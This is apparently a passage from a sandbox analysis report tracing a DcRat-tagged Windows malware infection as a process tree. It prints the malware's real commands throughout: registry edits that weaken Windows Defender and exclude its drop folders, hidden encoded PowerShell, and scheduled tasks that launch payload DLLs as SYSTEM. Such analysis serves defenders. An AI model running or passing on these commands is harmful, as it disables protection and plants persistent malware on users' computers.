      cmd: powershell "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"225451\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"225451\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"256596\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"256596\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"242872\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"242872\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749373\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749373\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147807942\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147807942\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735735\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735735\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737010\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737010\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737007\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737007\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737503\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737503\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735503\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735503\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749376\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749376\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737394\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737394\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147841147\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147841147\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"359386\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"359386\" /t REG_SZ /d 6 /reg:64;"
      - Drops file in System32 directory
      - Modifies data under HKEY_USERS
    [3] C:\Windows\SysWOW64\cmd.exe
        cmd: "C:\Windows\system32\cmd.exe" /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:32
      [4] C:\Windows\SysWOW64\reg.exe
          cmd: REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:32
    [3] C:\Windows\SysWOW64\reg.exe
        cmd: "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:64
    [3] C:\Windows\SysWOW64\reg.exe
        cmd: "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 256596 /t REG_SZ /d 6 /reg:32
    [3] C:\Windows\SysWOW64\reg.exe
        cmd: "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 256596 /t REG_SZ /d 6 /reg:64
    [3] C:\Windows\SysWOW64\reg.exe
        cmd: "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 242872 /t REG_SZ /d 6 /reg:32
    [3] C:\Windows\SysWOW64\reg.exe
        cmd: "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 242872 /t REG_SZ /d 6 /reg:64
        - Drops file in System32 directory
        - Modifies data under HKEY_USERS
    [3] C:\Windows\SysWOW64\reg.exe
        cmd: "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749373 /t REG_SZ /d 6 /reg:32
    [3] C:\Windows\SysWOW64\reg.exe
        cmd: "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749373 /t REG_SZ /d 6 /reg:64
    [3] C:\Windows\SysWOW64\reg.exe
        cmd: "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147807942 /t REG_SZ /d 6 /reg:32
    [3] C:\Windows\SysWOW64\reg.exe
        cmd: "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147807942 /t REG_SZ /d 6 /reg:64
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735735 /t REG_SZ /d 6 /reg:323⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735735 /t REG_SZ /d 6 /reg:643⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737010 /t REG_SZ /d 6 /reg:323⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737010 /t REG_SZ /d 6 /reg:643⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737007 /t REG_SZ /d 6 /reg:323⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737007 /t REG_SZ /d 6 /reg:643⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737503 /t REG_SZ /d 6 /reg:323⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737503 /t REG_SZ /d 6 /reg:643⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6 /reg:323⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6 /reg:643⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749376 /t REG_SZ /d 6 /reg:323⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749376 /t REG_SZ /d 6 /reg:643⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737394 /t REG_SZ /d 6 /reg:323⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737394 /t REG_SZ /d 6 /reg:643⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147841147 /t REG_SZ /d 6 /reg:323⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147841147 /t REG_SZ /d 6 /reg:643⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 359386 /t REG_SZ /d 6 /reg:323⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 359386 /t REG_SZ /d 6 /reg:643⤵
-
  C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    powershell "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\DlbZONUGhjVU2\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\DlbZONUGhjVU2\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\GpfcWYRxKqUn\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\GpfcWYRxKqUn\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\KrPQunXfXpAVC\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\KrPQunXfXpAVC\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\XChmUZBtIzzgBJhVhfR\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\XChmUZBtIzzgBJhVhfR\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\oVhJPNkDU\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\oVhJPNkDU\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\ProgramData\nBRnpywzcTvqknVB\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\ProgramData\nBRnpywzcTvqknVB\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Temp\qfiwemQmHAngVYpEP\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Temp\qfiwemQmHAngVYpEP\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Windows\Temp\wUBDPVxDQVpvNZiy\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Windows\Temp\wUBDPVxDQVpvNZiy\" /t REG_DWORD /d 0 /reg:64;"
    - Drops file in System32 directory
    - Modifies data under HKEY_USERS
-
    C:\Windows\SysWOW64\cmd.exe
      "C:\Windows\system32\cmd.exe" /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\DlbZONUGhjVU2" /t REG_DWORD /d 0 /reg:32
-
      C:\Windows\SysWOW64\reg.exe
        REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\DlbZONUGhjVU2" /t REG_DWORD /d 0 /reg:32
-
    C:\Windows\SysWOW64\reg.exe
      "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\DlbZONUGhjVU2" /t REG_DWORD /d 0 /reg:64
-
    C:\Windows\SysWOW64\reg.exe
      "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\GpfcWYRxKqUn" /t REG_DWORD /d 0 /reg:32
-
    C:\Windows\SysWOW64\reg.exe
      "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\GpfcWYRxKqUn" /t REG_DWORD /d 0 /reg:64
-
    C:\Windows\SysWOW64\reg.exe
      "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\KrPQunXfXpAVC" /t REG_DWORD /d 0 /reg:32
-
    C:\Windows\SysWOW64\reg.exe
      "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\KrPQunXfXpAVC" /t REG_DWORD /d 0 /reg:64
-
    C:\Windows\SysWOW64\reg.exe
      "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\XChmUZBtIzzgBJhVhfR" /t REG_DWORD /d 0 /reg:32
-
    C:\Windows\SysWOW64\reg.exe
      "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\XChmUZBtIzzgBJhVhfR" /t REG_DWORD /d 0 /reg:64
-
    C:\Windows\SysWOW64\reg.exe
      "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\oVhJPNkDU" /t REG_DWORD /d 0 /reg:32
-
    C:\Windows\SysWOW64\reg.exe
      "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\oVhJPNkDU" /t REG_DWORD /d 0 /reg:64
-
    C:\Windows\SysWOW64\reg.exe
      "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\ProgramData\nBRnpywzcTvqknVB /t REG_DWORD /d 0 /reg:32
-
    C:\Windows\SysWOW64\reg.exe
      "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\ProgramData\nBRnpywzcTvqknVB /t REG_DWORD /d 0 /reg:64
-
    C:\Windows\SysWOW64\reg.exe
      "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:32
-
    C:\Windows\SysWOW64\reg.exe
      "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:64
-
    C:\Windows\SysWOW64\reg.exe
      "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Users\Admin\AppData\Local\Temp\qfiwemQmHAngVYpEP /t REG_DWORD /d 0 /reg:32
-
    C:\Windows\SysWOW64\reg.exe
      "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Users\Admin\AppData\Local\Temp\qfiwemQmHAngVYpEP /t REG_DWORD /d 0 /reg:64
-
    C:\Windows\SysWOW64\reg.exe
      "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Windows\Temp\wUBDPVxDQVpvNZiy /t REG_DWORD /d 0 /reg:32
-
    C:\Windows\SysWOW64\reg.exe
      "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Windows\Temp\wUBDPVxDQVpvNZiy /t REG_DWORD /d 0 /reg:64
-
  C:\Windows\SysWOW64\schtasks.exe
    schtasks /CREATE /TN "gjIQiErgu" /SC once /ST 07:53:25 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="
    - DcRat
    - Creates scheduled task(s)
-
  C:\Windows\SysWOW64\schtasks.exe
    schtasks /run /I /tn "gjIQiErgu"
-
  C:\Windows\SysWOW64\schtasks.exe
    schtasks /DELETE /F /TN "gjIQiErgu"
-
  C:\Windows\SysWOW64\schtasks.exe
    schtasks /CREATE /TN "GyWbuVQzPmDmgkCMH" /SC once /ST 00:51:23 /RU "SYSTEM" /TR "\"C:\Windows\Temp\wUBDPVxDQVpvNZiy\RLuQQTfvaNwaabW\vaxPtPs.exe\" KS /bvsite_idTMx 385119 /S" /V1 /F
    - DcRat
    - Drops file in Windows directory
    - Creates scheduled task(s)
-
  C:\Windows\SysWOW64\schtasks.exe
    schtasks /run /I /tn "GyWbuVQzPmDmgkCMH"
-
C:\Users\Admin\AppData\Local\Temp\fefffe8cea\explothe.exe
  C:\Users\Admin\AppData\Local\Temp\fefffe8cea\explothe.exe
  - Executes dropped EXE
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE
  C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==
-
  C:\Windows\system32\gpupdate.exe
    "C:\Windows\system32\gpupdate.exe" /force
-
\??\c:\windows\system32\svchost.exe
  c:\windows\system32\svchost.exe -k localsystemnetworkrestricted -s fhsvc
-
C:\Windows\system32\gpscript.exe
  gpscript.exe /RefreshSystemParam
-
C:\Windows\windefender.exe
  C:\Windows\windefender.exe
  - Executes dropped EXE
  - Modifies data under HKEY_USERS
-
C:\Windows\Temp\wUBDPVxDQVpvNZiy\RLuQQTfvaNwaabW\vaxPtPs.exe
  C:\Windows\Temp\wUBDPVxDQVpvNZiy\RLuQQTfvaNwaabW\vaxPtPs.exe KS /bvsite_idTMx 385119 /S
  - Checks computer location settings
  - Executes dropped EXE
  - Drops Chrome extension
  - Drops desktop.ini file(s)
  - Drops file in System32 directory
  - Drops file in Program Files directory
  - Modifies data under HKEY_USERS
-
  C:\Windows\SysWOW64\schtasks.exe
    schtasks /DELETE /F /TN "bwpFiyeZPJPVdaMxTt"
-
  C:\Windows\SysWOW64\cmd.exe
    cmd /C REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /v "exe" /f /reg:32
-
    C:\Windows\SysWOW64\reg.exe
      REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /v "exe" /f /reg:32
-
  C:\Windows\SysWOW64\cmd.exe
    cmd /C REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /v "exe" /f /reg:64
-
    C:\Windows\SysWOW64\reg.exe
      REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /v "exe" /f /reg:64
-
  C:\Windows\SysWOW64\schtasks.exe
    schtasks /CREATE /TR "rundll32 \"C:\Program Files (x86)\oVhJPNkDU\pdqXAj.dll\",#1" /RU "SYSTEM" /SC ONLOGON /TN "ztlTbPYifermRZH" /V1 /F
    - DcRat
    - Drops file in Windows directory
    - Creates scheduled task(s)
-
    C:\Windows\System32\Conhost.exe
      \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
-
  C:\Windows\SysWOW64\schtasks.exe
    schtasks /CREATE /TN "ztlTbPYifermRZH2" /F /xml "C:\Program Files (x86)\oVhJPNkDU\oKlhKdZ.xml" /RU "SYSTEM"
    - DcRat
    - Creates scheduled task(s)
-
  C:\Windows\SysWOW64\schtasks.exe
    schtasks /END /TN "ztlTbPYifermRZH"
-
  C:\Windows\SysWOW64\schtasks.exe
    schtasks /DELETE /F /TN "ztlTbPYifermRZH"
-
  C:\Windows\SysWOW64\schtasks.exe
    schtasks /CREATE /TN "lYRFoiYPtWPCfC" /F /xml "C:\Program Files (x86)\DlbZONUGhjVU2\ayneOMs.xml" /RU "SYSTEM"
    - DcRat
    - Creates scheduled task(s)
-
  C:\Windows\SysWOW64\schtasks.exe
    schtasks /CREATE /TN "TrprvximDXTQo2" /F /xml "C:\ProgramData\nBRnpywzcTvqknVB\NTdmLBk.xml" /RU "SYSTEM"
    - DcRat
    - Creates scheduled task(s)
-
  C:\Windows\SysWOW64\schtasks.exe
    schtasks /CREATE /TN "NtSpqNxSmBAhIMqiB2" /F /xml "C:\Program Files (x86)\XChmUZBtIzzgBJhVhfR\MeffiZk.xml" /RU "SYSTEM"
    - DcRat
    - Creates scheduled task(s)
-
  C:\Windows\SysWOW64\schtasks.exe
    schtasks /CREATE /TN "gFXJCgZLnIrdqQxYYQs2" /F /xml "C:\Program Files (x86)\KrPQunXfXpAVC\NsLzZct.xml" /RU "SYSTEM"
    - DcRat
    - Creates scheduled task(s)
-
  C:\Windows\SysWOW64\schtasks.exe
    schtasks /CREATE /TN "HKFMMLmWpeGdwIqGl" /SC once /ST 22:30:17 /RU "SYSTEM" /TR "rundll32 \"C:\Windows\Temp\wUBDPVxDQVpvNZiy\YaCskhYt\AafvdvS.dll\",#1 /DWsite_idAwZ 385119" /V1 /F
    - DcRat
    - Drops file in Windows directory
    - Creates scheduled task(s)
-
  C:\Windows\SysWOW64\schtasks.exe
    schtasks /run /I /tn "HKFMMLmWpeGdwIqGl"
-
  C:\Windows\SysWOW64\cmd.exe
    cmd /C REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /v "SpyNetReporting" /f /reg:32
-
    C:\Windows\System32\Conhost.exe
      \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
-
    C:\Windows\SysWOW64\reg.exe
      REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /v "SpyNetReporting" /f /reg:32
-
  C:\Windows\SysWOW64\cmd.exe
    cmd /C REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /v "SpyNetReporting" /f /reg:64
    - Drops file in System32 directory
-
    C:\Windows\SysWOW64\reg.exe
      REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /v "SpyNetReporting" /f /reg:64
-
  C:\Windows\SysWOW64\schtasks.exe
    schtasks /DELETE /F /TN "GyWbuVQzPmDmgkCMH"
-
\??\c:\windows\system32\rundll32.EXE
  c:\windows\system32\rundll32.EXE "C:\Windows\Temp\wUBDPVxDQVpvNZiy\YaCskhYt\AafvdvS.dll",#1 /DWsite_idAwZ 385119
-
  C:\Windows\SysWOW64\rundll32.exe
    c:\windows\system32\rundll32.EXE "C:\Windows\Temp\wUBDPVxDQVpvNZiy\YaCskhYt\AafvdvS.dll",#1 /DWsite_idAwZ 385119
    - Blocklisted process makes network request
    - Checks BIOS information in registry
    - Loads dropped DLL
    - Drops file in System32 directory
    - Enumerates system info in registry
    - Modifies data under HKEY_USERS
-
    C:\Windows\SysWOW64\schtasks.exe
      schtasks /DELETE /F /TN "HKFMMLmWpeGdwIqGl"
-
C:\Users\Admin\AppData\Local\Temp\fefffe8cea\explothe.exe
  C:\Users\Admin\AppData\Local\Temp\fefffe8cea\explothe.exe
  - Executes dropped EXE
-
C:\Users\Admin\AppData\Local\Temp\fefffe8cea\explothe.exe
  C:\Users\Admin\AppData\Local\Temp\fefffe8cea\explothe.exe
  - Executes dropped EXE
-
C:\Users\Admin\AppData\Local\Temp\fefffe8cea\explothe.exe
  C:\Users\Admin\AppData\Local\Temp\fefffe8cea\explothe.exe
  - Executes dropped EXE
-
C:\Users\Admin\AppData\Local\Temp\fefffe8cea\explothe.exe
  C:\Users\Admin\AppData\Local\Temp\fefffe8cea\explothe.exe
  - Executes dropped EXE
-
C:\Users\Admin\AppData\Local\Temp\fefffe8cea\explothe.exe
  C:\Users\Admin\AppData\Local\Temp\fefffe8cea\explothe.exe
  - Executes dropped EXE
